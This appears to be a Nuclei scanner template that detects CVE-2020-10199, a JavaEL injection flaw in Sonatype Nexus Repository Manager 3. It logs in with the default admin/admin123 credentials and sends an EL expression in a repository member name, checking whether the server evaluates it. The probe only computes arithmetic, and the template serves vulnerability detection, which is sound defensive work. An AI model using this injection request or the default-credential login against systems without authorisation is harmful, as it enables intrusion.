id: CVE-2020-10199 info: name: Sonatype Nexus Repository Manager 3 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: high description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3. reference: - https://twitter.com/iamnoooob/status/1246182773427240967 - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype - https://nvd.nist.gov/vuln/detail/CVE-2020-10199 - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html - https://cwe.mitre.org/data/definitions/917.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 epss-score: 0.97374 epss-percentile: 0.99886 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonatype product: nexus tags: packetstorm,cve,cve2020,sonatype,nexus,rce,kev variables: username: admin password: admin123 http: - raw: - | POST /service/rapture/session HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{base64(username)}}&password={{base64(password)}} - | POST /service/rest/beta/repositories/bower/group HTTP/1.1 Host: {{Hostname}} NX-ANTI-CSRF-TOKEN: 1 Cookie: NX-ANTI-CSRF-TOKEN=1 Content-Type: application/json {"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}} cookie-reuse: true host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "Member repository does not exist: A9999" - type: status status: - 400 # digest: 4a0a00473045022015b161a1c0f1a527299bc83825ebae13599a53a9509da740daa961d1e7c32496022100a0db891c2c1d657bd419138bbe27a5e91de84888d58236ea62f69e497f4e9bee:922c64590222798bb761d5b6d8e72950